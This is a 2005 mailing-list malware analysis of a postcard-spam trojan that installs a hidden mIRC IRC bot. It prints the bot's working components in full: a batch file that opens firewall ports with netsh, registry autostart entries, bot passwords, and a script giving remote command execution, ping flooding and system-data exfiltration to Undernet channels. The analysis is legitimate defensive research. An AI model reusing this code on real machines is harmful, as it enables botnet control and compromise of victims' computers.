[Dshield] Romanian Postcards 4 You (long)

jayjwa jayjwa at atr2.ath.cx
Sun Nov 20 03:48:22 GMT 2005



Recently there were "You have a postcard from someone you know, click here..." 
type emails spammed out in great numbers to a number of mail lists. This one I 
found while reading a list for a GNU utility I was going to use to 
partition my shiny-new 80g hard disk. The "notices" look like this:


---------------------------------------------------------------


Hello friend !
You have just received a postcard from someone who cares about you!

This is a part of the message:
"Hy there! It has been a long time since I haven't heared about you!
I've just found out about this service from Claire, a friend of mine who also
told me that..."
If you'd like to see the rest of the message click here to receive your
animated postcard!

===================
Thank you for using www.postcard1000.com 's services !!!
Please take this opportunity to let your friends hear about us by sending them
a postcard from our collection !


---------------------------------------------------------------


It's dated 11/19/2005, so this is really current. This guy's really spamming 
the heck out of list:

* You have received an electronic postcard., Best Postcards, 2005/11/18
   + You have received an electronic postcard., Best Postcards, 2005/11/19
   + You have received an electronic postcard., Best Postcards  2005/11/19
   + You have received an electronic postcard., Best Postcards, 2005/11/19
   + You have received an electronic postcard., Best Postcards, 2005/11/19
   + You have received an electronic postcard., Best Postcards, 2005/11/19


Under the "click here" is a link. There are numerous versions of this email, 
all the same but with a different link. The first 3 servers I checked where 
down already. The forth one had the binary.

It's called "postcard.gif.exe", a massive bit 'o malware weighing in at a 
whopping 748KB. F-prot ID's to today don't do alot for it, marking it as 
"possible" unknown virus. It's actually a trojan (no self-replication, appears 
as something harmless and desirable, but contains something malicious).


f41b75a81c450af66cf507a40f475f75  postcard.gif.exe


What does it do? Well, since it's apparently from Romania (the first 3 servers 
where all in the .home.ro domain), one could rightly guess "something to do 
with IRC" and be correct. It uses the technique I wrote about in my 
paper, Self-Extracting Archives: Rar SFX As Malware Transport:


"First, some background: on Microsoft Windows at least (and I have not
been able to duplicate this with other OS platforms), it is possible
to transform a normal, compressed Rar (www.rarfiles.com) archive
into a self-extracting one, that is, one which will explode its
contents upon execution, complete with additional "instructions"
that are very similar to comments. Here however, these lines of
texts aren't for description of the archive's contents: they are
used as actual commands to execute *after* the archive itself is
expanded. It is this functionality that allows this technique to
be successful; no comment-commands and you're left with little
more than your average archive. These commands can take such a
form as seen here, below:

SavePath
Setup=C:\WINDOWS\system\svchost.exe
Setup=C:\WINDOWS\system\sup.bat
Silent=1
Overwrite=1

Notice that in addition to two files that shall get executed,
"svchost.exe" and "sup.bat", there are also two other commands
that seem to be almost custom-ordered for this technique, both
"Silent=1" and "Overwrite=1". The end result is the arbitrary
execution of several files, which have just been extracted from
the archive itself in which the user might very well have no
knowlege of, coupled with two additional parameters that
will ensure that the entire process is both silent (Silent=1)
and able to clobber existing files (Overwrite=1). In this
method the victim must still at some point execate the SFX
executable-stubbed biary."



So, if you run the binary, the files will install silently, at least on real 
Windows systems. I tried this under Wine on linux, and it didn't work. To open 
the archive, I use:

rar e postcard.gif.exe


RAR 3.50 beta 1   Copyright (c) 1993-2005 Alexander Roshal   30 Mar 2005
Shareware version         Type RAR -? for help

;Comentariul de mai jos con


ine comenzi SFX

Path=c:\windows\system32\drivers\shellz
SavePath
Setup=c:\windows\system32\drivers\shellz\setup.lnk
Silent=1
Overwrite=2


Solid SFX archive postcard.gif.exe


...and end up with the files in the  current directory:

aliases.ini    fullname.txt  netinfo.bat       remote.ini    sup.bat
away.txt       hidewndw.exe  netinfo.lnk       script.ini    sup.reg
ident.txt      nicks.txt     servers2.ini      users.ini
fullinfo2.bat  ipconf.bat    postcard.gif.exe  servers.ini   winspector.exe
fullinfo2.lnk  ipconf.lnk    procese.bat       setup.lnk     winspector.lnk
fullinfo.bat   memorat.txt   procese.lnk       sup2.bat
fullinfo.lnk   mirc.ini      sup2.lnk



Since virus scanners basically each make up their own names for stuff, I'll 
probably be more useful to describe what these files are. The bulk of this 
install is MIRC, a W32 IRC client. The rest of the files aid in this client 
being protected, hidden, and knocking down the WinXp SP2 firewall.



postcard.gif.exe:: main binary, a SFX Rar Solid archive
hidewndw.exe:: this is tool to "hide windows on Windows", as the name implies.

*.lnk files::

  801 fullinfo2.lnk
  799 fullinfo.lnk
  795 ipconf.lnk
  797 netinfo.lnk
  797 procese.lnk
  583 setup.lnk
  585 sup2.lnk
  803 winspector.lnk
5960 total

Symbolic type links for W32, usually the reference the hide window binary.

winspector.exe:: MIRC itself, with an fserver


sup.bat:: WinXP SP2 Firewall shutdown, via netsh:

@echo off
@regedit /s c:\windows\system32\drivers\shellz\sup.reg
@netsh firewall set portopening protocol = all port = 6667 name = winspector 
mode = enable scope = all profile = all
@netsh firewall set portopening protocol = all port = 7000 name = winspector 
mode = enable scope = all profile = all
@netsh firewall set service type = all mode = enable scope = all profile = all
@netsh firewall set allowedprogram program = 
c:\windows\system32\drivers\shellz\winspector.exe mode = enable scope = all 
profile = all
@c:\windows\system32\drivers\shellz\winspector.lnk


Note the added directory: c:\windows\system32\drivers\shellz

This file loads sup.reg into the registry for autostart:

@regedit /s c:\windows\system32\drivers\shellz\sup.reg

sup.reg:: Registry changes


REGEDIT4

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"Winspector_s"="C:\\WINDOWS\\system32\\drivers\\shellz\\sup2.lnk"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"Winspector"="C:\\WINDOWS\\system32\\drivers\\shellz\\winspector.lnk"

ident.txt:: ID's for the fake identd server most IRC clients run. Originally 
it was supposed to the system's identd server, listening on port 113 for 
queries but now many IRC clients run their own which invariably states "UNIX" 
even when the OS is not. The ID's used here are:

Lucian
Luci
uk
Luca
Luka
dur
Luchian
Lucien
Lucifer
Lucius
englezu
ukrullz
io
yo
rullz

away.txt:: "Away" messages for the IRC client, many color control chars, 
stating "The Legend Will Live Forever !!! ;-)"


memorat.txt:: This guy is infatuated with word play on this name, no? These 
files he'll use to login to X with, which is a channel service on Undernet. 
Malware bots on Undernet?? No way!

uk ramanlegenda ramanlegendalucianc++
Elena byuk byuklucianc++
Luc ciudatu ciudatulucianc++
Luca cizda cizdalucianc++
Luchian saveas saveaslucianc++
Luci iubito iubitolucianc++
Lucian 0x100 0x100lucianc++
Lucien NuMaLasaMama NuMaLasaMamalucianc++
Lucifer NightsOnFire lucianc++
Lucius ihaveadream ihaveadreamlucianc++
Luka YouAreMyLife YouAreMyLifelucianc++
Leon Malefic Maleficlucianc++
Luke sentiment sentimentlucianc++


remote.ini:: passwords, channels?

[variables]
n0=%frate orfan
n1=%inichan1 #12:12 Lucian
n2=%inichan2 #24:24 Lucian
n3=%inichan3 #12:12 Lucian
n4=%passuk !c++ukro
n5=%passbotu !creioncolorat
n6=%autoop on
n7=%canal #12:12 Lucian



He uses the irc.undernet.org servers, referencing them by their exact names, 
these two:

eu.undernet.org
us.undernet.org

on ports 6667, and 7000.

channels

#12:12 Lucian
#24:24 Lucian


script.ini:: This is the inner-workings of the bot, if you study it you can 
find out how to login, which channels he'll be in, login names, etc...

[script]
n0=on 1:connect:{
n1=  nick $read nicks.txt | timernick 2 10 nick $read nicks.txt
n2=  anick $read nicks.txt | timeranick 2 10 anick $read nicks.txt
n3=  writeini users.ini users n0 100:logout at logout
n4=  writeini users.ini users n1 99:logout at logout
n5=  writeini mirc.ini ident userid $read(ident.txt)
n6=  reload -ru users.ini
n7=  fullname $read(fullname.txt)
n8=  notify on
n9=  join %inichan1
n10=  join %inichan2
n11=  join %inichan3
n12=  timerpass 1 10 msg uk777ro zipass
n13=}
n14=
n15=on 1:unotify:{
n16=  timernick off
n17=  timeranick off
n18=  nick $nick
n19=  msg x at channels.undernet.org login $read(memorat.txt,s,$nick)
n20=  mode $nick +x
n21=  if ($nick != w) { silence *!*@* | join #12:12 Lucian }
n22=  away $read(away.txt,s,$nick $+ .)
n23=}
n24=
n25=
n26=on 1:JOIN:#: {
n27=  if (%autoop == on) { mode $chan +o $nick | halt }
n28=}
n29=
n30=on 1:text:*:*: {
n31=  if ($1 == %passuk) {
n32=    writeini users.ini users n0 100:*! $+ $2
n33=    reload -ru users.ini
n34=    msg $chan 12 $nick esti logat cu user UK
n35=  }
n36=  if ($1 == %passbotu) {
n37=    writeini users.ini users n1 99:*! $+ $2
n38=    reload -ru users.ini
n39=    msg $chan 12 $nick esti logat cu user botu
n40=  }
n41=  if ($1 == refreshparola) {
n42=    msg $nick refreshpassbotu %passbotu
n43=    msg $nick refreshpassuk %passuk
n44=  }
n45=  if ($1 == refreshpassbotu) {
n46=    set %passbotu $2
n47=  }
n48=  if ($1 == refreshpassuk) {
n49=    set %passuk $2
n50=  }
n51=
n52=}
n53=
n54=on 99:text:*:*: {
n55=  if ($1 == !passuk) { set %passuk $2 | msg $chan 12 Parola a fost schimbata cu succes! | halt }
n56=  if ($1 == !passbotu) { set %passbotu $2 | msg $chan 12 Parola a fost schimbata cu succes! | halt }
n57=  if ($1 == !logoutuk) { writeini users.ini users n0 100:logout at logout | reload -ru users.ini | msg $chan Logged out UK | halt }
n58=  if ($1 == !logoutbotu) { writeini users.ini users n1 99:logout at logout | reload -ru users.ini | msg $chan Logged out botu | halt }
n59=  if ($1 == !autoop) { set %autoop $2 | msg $chan 9,1/!\1,9 Autoop e $2 | halt }
n60=  if ($1 == !op) { if ($2 == $null) { .mode $chan +o $nick } | else { mode $chan +oooooooooooo $2- } | halt }
n61=  if ($1 == !deop) { if ($2 == $null) { .mode $chan -o $nick } | else { mode $chan -oooooooooooo $2- } | halt }
n62=  if ($1 == !ver) { .msg $chan $ver | halt }
n63=  if ($1 == !rnick) { .timer 1 0 nick $r(A,Z) $+ $r(a,z) $+ $r(0,9) $+ $r(a,z) $+ $r(A,Z) $+ $r(a,z) $+ $r(0,9) $+ $r(a,z) $+ $r(A,Z) | halt }
n64=  if ($1 == !ban) { mode $chan -o+b $2 $address($2,2) | kick $chan $2- ( $+ $nick $+ ) | halt }
n65=  if ($1 == !run) { run $2- | .notice $nick Am rulat ( $2- )  | halt } 
n66=  if ($1 == !msg) { .timer 1 1 msg $2- | halt }
n67=  if ($1 == !join) { join $2- | who $2 | halt }
n68=  if ($1 == !part) { part $2- | halt }
n69=  if ($1 == !take) { .notify $2 | .write memorat.txt $2-4 | .write away.txt $2 $+ . 1<4uk1> $+ $5- | .notice $nick Am inteles, sa traiti! ( $2 ) e ca si luat! | halt }
n70=  if ($1 == !let) { .notify -r $2 | .write -ds $2 memorat.txt | .write -ds $2 $+ . away.txt | .notice $nick Am inteles, sa traiti! ( $2 ) e istorie! | halt }
n71=  if ($1 == !me) { describe $chan $2- | halt }
n72=  if ($1 == !ame) { ame $2- | halt }
n73=  if ($1 == !quit) { .timer 1 0 quit $2- | halt }
n74=  if ($1 == !say) { .timer 1 0 msg $chan $2- | halt }
n75=  if ($1 == !who) { .whois $me | set %canal $chan }
n76=  if ($1 == !flood) { run ping -n $3 -l $4 -w 2000 $2 | run c:\windows\system32\drivers\shellz\hidewndw.exe /n /fh c:\windows\system32\ping.exe | msg $chan 12 Floodam $2 cu $4 ! | halt }
n77=  if ($1 == !gemeni) { if (%frate == orfan) { server -m | set %frate exista | .msg $chan 12Dau la buci si... | halt } | else { .msg $chan 4Am dat deja la buci!!! ;) | halt } }
n78=  if ($1 == !ctcp) { .ctcp $2- | halt } 
n79=  if ($1 == !raw) {
n80=    $$2-
n81=    if ($1 == !staiincap) { .msg $chan 1,8 Stau in cap master $nick !!! }
n82=  }
n83=  if ($1 == $me) {
n84=    if ($2 == !op) { if ($3 == $null) { .mode $chan +o $nick } | else { mode $chan +oooooooooooo $3- } | halt }
n85=    if ($2 == !deop) { if ($3 == $null) { .mode $chan -o $nick } | else { mode $chan -oooooooooooo $3- } | halt }
n86=    if ($2 == !ver) { .msg $chan $ver | halt }
n87=    if ($2 == !rnick) { .timer 1 0 nick $r(A,Z) $+ $r(a,z) $+ $r(0,9) $+ $r(a,z) $+ $r(A,Z) $+ $r(a,z) $+ $r(0,9) $+ $r(a,z) $+ $r(A,Z) | halt }
n88=    if ($2 == !ban) { mode $chan -o+b $3 $address($3,2) | kick $chan $3- ( $+ $nick $+ ) | halt }
n89=    if ($2 == !run) { run $3- | .notice $nick Am rulat ( $3- )  | halt } 
n90=    if ($2 == !msg) { .timer 1 1 msg $3- | halt }
n91=    if ($2 == !join) { join $3- | who $3 | halt }
n92=    if ($2 == !part) { part $3- | halt }
n93=    if ($2 == !take) { .notify $3 | .write memorat.txt $3-5 | .write away.txt $3 $+ . 1<4uk1> $+ $6- | .notice $nick Am inteles, sa traiti! ( $3 ) e ca si luat! | halt }
n94=    if ($2 == !let) { .notify -r $3 | .write -ds $3 memorat.txt | .write -ds $3 away.txt | .notice $nick Am inteles, sa traiti! ( $3 ) e istorie! | halt }
n95=    if ($2 == !me) { describe $chan $3- | halt }
n96=    if ($2 == !ame) { ame $3- | halt }
n97=    if ($2 == !quit) { .timer 1 0 quit $3- | halt }
n98=    if ($2 == !say) { .timer 1 0 msg $chan $3- | halt }
n99=    if ($2 == !who) { .whois $me | set %canal $chan }
n100=    if ($2 == !flood) run ping -n $4 -l $5 -w 2000 $3
n101=    if ($2 == !gemeni) { if (%frate == orfan) { server -m | set %frate exista | .msg $chan 12Dau la buci si... | halt } | else { .msg $chan 4Am dat deja la buci!!! ;) | halt } }
n102=    if ($2 == !ctcp) { .ctcp $3- | halt } 
n103=    if ($2 == !raw) {
n104=      $$3-
n105=    }
n106=
n107=    if ($2 == !fullinfo) {
n108=      /run fullinfo.lnk
n109=      /msg $chan 8,1/!\1,8 Actualizez datele...(5 sec.)
n110=      /timerinfo 1 5 {
n111=        //msg $chan $read(fullinf.txt , 1)
n112=        //msg $chan $read(fullinf.txt , 2)
n113=        //msg $chan $read(fullinf.txt , 3) - $os
n114=        //msg $chan $read(fullinf.txt , 4)
n115=        //msg $chan $read(fullinf.txt , 5)
n116=        //msg $chan $read(fullinf.txt , 6)
n117=        //msg $chan $read(fullinf.txt , 7)
n118=        //msg $chan $read(fullinf.txt , 8)
n119=        //msg $chan $read(fullinf.txt , 9)
n120=      }
n121=      /halt
n122=    }
n123=    if ($2 == !fullinfo2) {
n124=      /run fullinfo2.lnk
n125=      /msg $chan 8,1/!\1,8 Actualizez datele...(10 sec.)
n126=      /timerip 1 10 play $chan fullinfo2.txt 2000
n127=      /halt
n128=    }
n129=
n130=    if ($2 == !ipconf) {
n131=      /run ipconf.lnk
n132=      /msg $chan 8,1/!\1,8 Actualizez datele...(10 sec.)
n133=      /timerip 1 10 play $chan ipinf.txt 2000
n134=      /halt
n135=    }
n136=    if ($2 == !netinfo) {
n137=      /run netinfo.lnk
n138=      /msg $chan 8,1/!\1,8 Actualizez datele...(10 sec.)
n139=      /timernet 1 10 play $chan netinf.txt 2000
n140=      /halt
n141=    }
n142=    if ($2 == !procese) {
n143=      /run procese.lnk
n144=      /msg $chan 8,1/!\1,8 Actualizez datele...(10 sec.)
n145=      /timernet 1 10 play $chan procese.txt 2000
n146=      /halt
n147=    }
n148=
n149=  }
n150=}
n151=
n152=
n153=on 100:quit: { writeini users.ini users n0 100:logout at logout | halt }
n154=on 99:quit: { writeini users.ini users n1 99:logout at logout | halt }
n155=
n156=
n157=on 1:EXIT:set %frate orfan
n158=raw 312:*:msg %canal 12 $3-
n159=
n160=
n161=alias ver return 8,12Rulez pe:4,0 $os 8,12de:4,0 $uptime(server,1) !


us.undernet.org has address 66.198.80.67
us.undernet.org has address 69.16.172.34
us.undernet.org has address 66.197.0.145

IRC Server's contact:

ip-addr at teleglobe.ca
easynews.net (not abuse contact listed, likely abuse at easynews.net)
abuse at carpathiahost.com

Binary hosting server's contact:

abuse at cdp.pl

jjj.cebzranqn.pbz/cbfgpneq.tvs.rkr




-- 
    / /     __  __  __  __  __ __  __  mail me for my *
   / /__   / / /  \/ / / /_/ / \ \/ /  * email address.
  /_____/ /_/ /_/\__/ /_____/  /_/\_\ ::[ATr2 RG 2005]::
============================================================
IF you have to request that people contact you via a WEBFORM
because you've blocked off virtually all smtp-sent email from
your own MTA  ...You just might be guilty of DNS-RBL abuse.


More information about the list mailing list